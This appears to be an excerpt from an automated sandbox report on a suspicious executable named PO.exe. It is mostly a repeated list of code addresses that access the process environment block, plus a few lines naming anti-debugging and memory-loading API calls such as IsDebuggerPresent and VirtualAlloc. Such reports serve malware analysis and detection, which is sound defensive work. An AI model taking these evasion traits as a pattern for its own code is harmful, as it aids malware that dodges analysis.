          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_73CA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_73CA1000
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0255165D mov eax, dword ptr fs:[00000030h]0_2_0255165D
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_02551875 mov eax, dword ptr fs:[00000030h]0_2_02551875
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]1_2_00A120A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]1_2_00A120A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]1_2_00A120A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]1_2_00A120A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]1_2_00A120A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A120A0 mov eax, dword ptr fs:[00000030h]1_2_00A120A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A290AF mov eax, dword ptr fs:[00000030h]1_2_00A290AF
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9080 mov eax, dword ptr fs:[00000030h]1_2_009E9080
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A1F0BF
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1F0BF mov eax, dword ptr fs:[00000030h]1_2_00A1F0BF
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1F0BF mov eax, dword ptr fs:[00000030h]1_2_00A1F0BF
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A63884 mov eax, dword ptr fs:[00000030h]1_2_00A63884
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A63884 mov eax, dword ptr fs:[00000030h]1_2_00A63884
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E58EC mov eax, dword ptr fs:[00000030h]1_2_009E58EC
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A7B8D0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov ecx, dword ptr fs:[00000030h]1_2_00A7B8D0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A7B8D0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A7B8D0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A7B8D0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B8D0 mov eax, dword ptr fs:[00000030h]1_2_00A7B8D0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]1_2_00A1002D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]1_2_00A1002D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]1_2_00A1002D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]1_2_00A1002D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1002D mov eax, dword ptr fs:[00000030h]1_2_00A1002D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67016 mov eax, dword ptr fs:[00000030h]1_2_00A67016
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67016 mov eax, dword ptr fs:[00000030h]1_2_00A67016
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A67016 mov eax, dword ptr fs:[00000030h]1_2_00A67016
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FB02A mov eax, dword ptr fs:[00000030h]1_2_009FB02A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FB02A mov eax, dword ptr fs:[00000030h]1_2_009FB02A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FB02A mov eax, dword ptr fs:[00000030h]1_2_009FB02A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FB02A mov eax, dword ptr fs:[00000030h]1_2_009FB02A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB4015 mov eax, dword ptr fs:[00000030h]1_2_00AB4015
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB4015 mov eax, dword ptr fs:[00000030h]1_2_00AB4015
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA2073 mov eax, dword ptr fs:[00000030h]1_2_00AA2073
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB1074 mov eax, dword ptr fs:[00000030h]1_2_00AB1074
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A00050 mov eax, dword ptr fs:[00000030h]1_2_00A00050
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A00050 mov eax, dword ptr fs:[00000030h]1_2_00A00050
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A669A6 mov eax, dword ptr fs:[00000030h]1_2_00A669A6
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A161A0 mov eax, dword ptr fs:[00000030h]1_2_00A161A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A161A0 mov eax, dword ptr fs:[00000030h]1_2_00A161A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A651BE mov eax, dword ptr fs:[00000030h]1_2_00A651BE
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A651BE mov eax, dword ptr fs:[00000030h]1_2_00A651BE
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A651BE mov eax, dword ptr fs:[00000030h]1_2_00A651BE
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A651BE mov eax, dword ptr fs:[00000030h]1_2_00A651BE
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0C182 mov eax, dword ptr fs:[00000030h]1_2_00A0C182
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A185 mov eax, dword ptr fs:[00000030h]1_2_00A1A185
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12990 mov eax, dword ptr fs:[00000030h]1_2_00A12990
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A741E8 mov eax, dword ptr fs:[00000030h]1_2_00A741E8
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EB1E1 mov eax, dword ptr fs:[00000030h]1_2_009EB1E1
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EB1E1 mov eax, dword ptr fs:[00000030h]1_2_009EB1E1
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EB1E1 mov eax, dword ptr fs:[00000030h]1_2_009EB1E1
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120 mov eax, dword ptr fs:[00000030h]1_2_00A04120
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120 mov eax, dword ptr fs:[00000030h]1_2_00A04120
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120 mov eax, dword ptr fs:[00000030h]1_2_00A04120
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120 mov eax, dword ptr fs:[00000030h]1_2_00A04120
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A04120 mov ecx, dword ptr fs:[00000030h]1_2_00A04120
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1513A mov eax, dword ptr fs:[00000030h]1_2_00A1513A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1513A mov eax, dword ptr fs:[00000030h]1_2_00A1513A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9100 mov eax, dword ptr fs:[00000030h]1_2_009E9100
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9100 mov eax, dword ptr fs:[00000030h]1_2_009E9100
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9100 mov eax, dword ptr fs:[00000030h]1_2_009E9100
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0B944 mov eax, dword ptr fs:[00000030h]1_2_00A0B944
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0B944 mov eax, dword ptr fs:[00000030h]1_2_00A0B944
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EB171 mov eax, dword ptr fs:[00000030h]1_2_009EB171
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EB171 mov eax, dword ptr fs:[00000030h]1_2_009EB171
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC962 mov eax, dword ptr fs:[00000030h]1_2_009EC962
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A1FAB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FAAB0 mov eax, dword ptr fs:[00000030h]1_2_009FAAB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FAAB0 mov eax, dword ptr fs:[00000030h]1_2_009FAAB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1D294 mov eax, dword ptr fs:[00000030h]1_2_00A1D294
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1D294 mov eax, dword ptr fs:[00000030h]1_2_00A1D294
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]1_2_009E52A5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]1_2_009E52A5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]1_2_009E52A5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]1_2_009E52A5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E52A5 mov eax, dword ptr fs:[00000030h]1_2_009E52A5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12AE4 mov eax, dword ptr fs:[00000030h]1_2_00A12AE4
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12ACB mov eax, dword ptr fs:[00000030h]1_2_00A12ACB
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EAA16 mov eax, dword ptr fs:[00000030h]1_2_009EAA16
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EAA16 mov eax, dword ptr fs:[00000030h]1_2_009EAA16
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A24A2C mov eax, dword ptr fs:[00000030h]1_2_00A24A2C
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A24A2C mov eax, dword ptr fs:[00000030h]1_2_00A24A2C
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov eax, dword ptr fs:[00000030h]1_2_009E5210
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov ecx, dword ptr fs:[00000030h]1_2_009E5210
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov eax, dword ptr fs:[00000030h]1_2_009E5210
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E5210 mov eax, dword ptr fs:[00000030h]1_2_009E5210
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F8A0A mov eax, dword ptr fs:[00000030h]1_2_009F8A0A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A03A1C mov eax, dword ptr fs:[00000030h]1_2_00A03A1C
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9B260 mov eax, dword ptr fs:[00000030h]1_2_00A9B260
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9B260 mov eax, dword ptr fs:[00000030h]1_2_00A9B260
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8A62 mov eax, dword ptr fs:[00000030h]1_2_00AB8A62
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A2927A mov eax, dword ptr fs:[00000030h]1_2_00A2927A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]1_2_009E9240
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]1_2_009E9240
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]1_2_009E9240
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E9240 mov eax, dword ptr fs:[00000030h]1_2_009E9240
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A74257 mov eax, dword ptr fs:[00000030h]1_2_00A74257
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14BAD mov eax, dword ptr fs:[00000030h]1_2_00A14BAD
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14BAD mov eax, dword ptr fs:[00000030h]1_2_00A14BAD
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14BAD mov eax, dword ptr fs:[00000030h]1_2_00A14BAD
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB5BA5 mov eax, dword ptr fs:[00000030h]1_2_00AB5BA5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F1B8F mov eax, dword ptr fs:[00000030h]1_2_009F1B8F
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F1B8F mov eax, dword ptr fs:[00000030h]1_2_009F1B8F
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA138A mov eax, dword ptr fs:[00000030h]1_2_00AA138A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9D380 mov ecx, dword ptr fs:[00000030h]1_2_00A9D380
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1B390 mov eax, dword ptr fs:[00000030h]1_2_00A1B390
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12397 mov eax, dword ptr fs:[00000030h]1_2_00A12397
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]1_2_00A103E2
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]1_2_00A103E2
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]1_2_00A103E2
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]1_2_00A103E2
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]1_2_00A103E2
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A103E2 mov eax, dword ptr fs:[00000030h]1_2_00A103E2
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A0DBE9
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A653CA mov eax, dword ptr fs:[00000030h]1_2_00A653CA
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A653CA mov eax, dword ptr fs:[00000030h]1_2_00A653CA
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA131B mov eax, dword ptr fs:[00000030h]1_2_00AA131B
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EF358 mov eax, dword ptr fs:[00000030h]1_2_009EF358
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A13B7A mov eax, dword ptr fs:[00000030h]1_2_00A13B7A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A13B7A mov eax, dword ptr fs:[00000030h]1_2_00A13B7A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EDB40 mov eax, dword ptr fs:[00000030h]1_2_009EDB40
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8B58 mov eax, dword ptr fs:[00000030h]1_2_00AB8B58
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EDB60 mov ecx, dword ptr fs:[00000030h]1_2_009EDB60
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F849B mov eax, dword ptr fs:[00000030h]1_2_009F849B
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA14FB mov eax, dword ptr fs:[00000030h]1_2_00AA14FB
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66CF0 mov eax, dword ptr fs:[00000030h]1_2_00A66CF0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66CF0 mov eax, dword ptr fs:[00000030h]1_2_00A66CF0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66CF0 mov eax, dword ptr fs:[00000030h]1_2_00A66CF0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8CD6 mov eax, dword ptr fs:[00000030h]1_2_00AB8CD6
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1BC2C mov eax, dword ptr fs:[00000030h]1_2_00A1BC2C
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB740D mov eax, dword ptr fs:[00000030h]1_2_00AB740D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB740D mov eax, dword ptr fs:[00000030h]1_2_00AB740D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB740D mov eax, dword ptr fs:[00000030h]1_2_00AB740D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AA1C06 mov eax, dword ptr fs:[00000030h]1_2_00AA1C06
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]1_2_00A66C0A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]1_2_00A66C0A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]1_2_00A66C0A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66C0A mov eax, dword ptr fs:[00000030h]1_2_00A66C0A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0746D mov eax, dword ptr fs:[00000030h]1_2_00A0746D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1A44B mov eax, dword ptr fs:[00000030h]1_2_00A1A44B
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7C450 mov eax, dword ptr fs:[00000030h]1_2_00A7C450
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7C450 mov eax, dword ptr fs:[00000030h]1_2_00A7C450
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A135A1 mov eax, dword ptr fs:[00000030h]1_2_00A135A1
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB05AC mov eax, dword ptr fs:[00000030h]1_2_00AB05AC
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB05AC mov eax, dword ptr fs:[00000030h]1_2_00AB05AC
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]1_2_009E2D8A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]1_2_009E2D8A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]1_2_009E2D8A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]1_2_009E2D8A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009E2D8A mov eax, dword ptr fs:[00000030h]1_2_009E2D8A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A11DB5 mov eax, dword ptr fs:[00000030h]1_2_00A11DB5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A11DB5 mov eax, dword ptr fs:[00000030h]1_2_00A11DB5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A11DB5 mov eax, dword ptr fs:[00000030h]1_2_00A11DB5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]1_2_00A12581
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]1_2_00A12581
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]1_2_00A12581
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A12581 mov eax, dword ptr fs:[00000030h]1_2_00A12581
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1FD9B mov eax, dword ptr fs:[00000030h]1_2_00A1FD9B
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A1FD9B mov eax, dword ptr fs:[00000030h]1_2_00A1FD9B
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A98DF1 mov eax, dword ptr fs:[00000030h]1_2_00A98DF1
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]1_2_00A66DC9
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]1_2_00A66DC9
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]1_2_00A66DC9
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A66DC9
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]1_2_00A66DC9
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A66DC9 mov eax, dword ptr fs:[00000030h]1_2_00A66DC9
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FD5E0 mov eax, dword ptr fs:[00000030h]1_2_009FD5E0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009FD5E0 mov eax, dword ptr fs:[00000030h]1_2_009FD5E0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6A537 mov eax, dword ptr fs:[00000030h]1_2_00A6A537
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14D3B mov eax, dword ptr fs:[00000030h]1_2_00A14D3B
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14D3B mov eax, dword ptr fs:[00000030h]1_2_00A14D3B
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A14D3B mov eax, dword ptr fs:[00000030h]1_2_00A14D3B
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8D34 mov eax, dword ptr fs:[00000030h]1_2_00AB8D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F3D34 mov eax, dword ptr fs:[00000030h]1_2_009F3D34
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EAD30 mov eax, dword ptr fs:[00000030h]1_2_009EAD30
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0C577 mov eax, dword ptr fs:[00000030h]1_2_00A0C577
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A0C577 mov eax, dword ptr fs:[00000030h]1_2_00A0C577
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A23D43 mov eax, dword ptr fs:[00000030h]1_2_00A23D43
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A63540 mov eax, dword ptr fs:[00000030h]1_2_00A63540
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A07D50 mov eax, dword ptr fs:[00000030h]1_2_00A07D50
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A646A7 mov eax, dword ptr fs:[00000030h]1_2_00A646A7
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AB0EA5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AB0EA5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB0EA5 mov eax, dword ptr fs:[00000030h]1_2_00AB0EA5
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7FE87 mov eax, dword ptr fs:[00000030h]1_2_00A7FE87
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A116E0 mov ecx, dword ptr fs:[00000030h]1_2_00A116E0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A28EC7 mov eax, dword ptr fs:[00000030h]1_2_00A28EC7
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9FEC0 mov eax, dword ptr fs:[00000030h]1_2_00A9FEC0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A136CC mov eax, dword ptr fs:[00000030h]1_2_00A136CC
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AB8ED6 mov eax, dword ptr fs:[00000030h]1_2_00AB8ED6
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009F76E2 mov eax, dword ptr fs:[00000030h]1_2_009F76E2
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A9FE3F mov eax, dword ptr fs:[00000030h]1_2_00A9FE3F
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_009EC600 mov eax, dword ptr fs:[00000030h]1_2_009EC600
